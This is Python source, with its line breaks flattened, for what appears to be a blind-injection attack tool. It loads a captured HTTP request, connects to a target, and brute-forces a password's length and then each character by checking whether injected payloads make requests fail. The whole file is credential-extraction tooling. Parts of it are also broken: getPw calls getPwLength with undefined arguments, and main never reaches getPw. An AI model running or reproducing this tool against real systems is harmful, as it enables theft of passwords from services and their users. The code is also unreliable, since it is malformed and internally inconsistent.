def getPwLength(connection): pwLength = -1 n = 0 for n in range(1, 31): payload = buildPayloadForLength(n) if not requestFailed(payload, connection): chitter.info(" payload: {}".format(payload)) pwLength = n break print("[+++] password length = {} characters wide.".format(pwLength)) return pwLength
def main(): chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") chitter.post("") chitter.post("{}".format(__banner__)) chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") chitter.info(__description__) chitter.debug("TEST TEST TEST") # argument parser parser = argparse.ArgumentParser() args = initParser(parser) chitter.status("parse input parameters") # initialization / read in file with headerfield definitions chitter.status("read parameters from requestheader file '{}'".format( __gHeaderfieldsFile__)) init() __gInputParameters__.update(handleArgs(args)) updateHeaders(__gInputParameters__['headerfile']) # update for k in __gRequestParameters__.keys(): if k != __gXparam__ and not k in __gExclude__: __gInclude__.update({k: __gRequestParameters__[k]}) try: for x in __gExclude__: del __gInclude__[x] except: pass __connection__ = connectTarget() if __connection__ != None: if __gTestHeader__: testConnection(__connection__) else: getPwLength(__connection__) else: chitter.fatal("Connection could not be established!") exit(0) # dont forget to close __connection__ __connection__.close()
def getPw(connection): pw = "" c = 32 pwLength = getPwLength(header, inputParameters, requestParameters) if pwLength > -1: for n in range(1, pwLength + 1): c = 32 for c in range(32, 128): payload = buildPayloadForName(chr(c), n) if not requestFailed(payload, connection): chitter.info(" payload: {}".format(payload)) pw += chr(c) chitter.info(" pw={}".format(pw)) break else: print( "[-] Password retrievel failed. Password length could not be determined!" ) print("[+++ FOUND +++] password = {}".format(pw))
def updateHeaders(__headerFile__): #method="" try: with open(__headerFile__, 'r') as hf: chitter.info(" -----------------------------------------") chitter.info(" header request fields from header file:") for line in hf.readlines(): sline = line.strip("\n") fieldFound = False for k, v in __gHeaderFields__.items(): # only proceed if match is not followed by a '-' to avoid mixup e.g. for Accept vs. Accept-Encoding if sline.find(k) > -1 and sline[len(k)] != '-': v = sline[(sline.find(k) + len(k)):(len(sline) + 1)] v = re.sub(r'^[:| #]*', '', v) #remove ':',' ','|' from the beginning __gHeader__.update({k: v}) chitter.info("\t {}: {}".format(k, v)) if (k == 'Cookie'): updateCookies(v) fieldFound = True if (k == 'Host'): __gInputParameters__.update({'target': v}) break if (not fieldFound): if sline != "": if sline.find("GET") > -1 or sline.find("POST") > -1: readRequestHeader(line) else: if (__gInputParameters__['method'] == "POST"): #sline=line.strip("\n") chitter.info( "\t-----------------------------------------" ) chitter.info( "\tPOST request parameters from header file:" ) updateRequestParameters(sline, "POST") except Exception as e: print("[!!!] Error in updateHeaders()!") print(e)
def readRequestHeader(line): (method, loc, h) = line.split(" ") h = h.strip('\n') chitter.info("\t[REQUEST] {} {} {}".format(method, loc, h)) if (method != "POST" and method != "GET"): method = "" loc = "" h = "" elif (method == "GET"): if loc.find("?") > -1: loc = re.sub(r'[\n ]*', '', loc) (path, p) = loc.split("?") updateRequestParameters(p, "GET") else: path = loc #assuming path without request parameters chitter.warn( "Did not find any RequestParameters in provided Header") elif (method == "POST"): path = loc __gInputParameters__.update({'method': method, 'path': path})
def testConnection(connection): requestParameters = urllib.parse.urlencode(__gRequestParameters__) connection.request(__gInputParameters__['method'], __gInputParameters__['path'], requestParameters, __gHeader__) resp = connection.getresponse() chitter.status("[CONNECTION] {} - {}".format(resp.status, resp.reason)) data = resp.read(100) try: data_out = gzip.decompress(data) except: data_out = data pass chitter.info(str(resp.status) + " | " + str(resp.reason)) chitter.info("RESPONSE HEADERS") for key in resp.headers: chitter.info("\t" + key + " : " + resp.headers[key]) chitter.info("BODY:\n\t") chitter.info("--------- BODY BEGIN ---------") chitter.info(data_out) chitter.info("--------- BODY END ---------")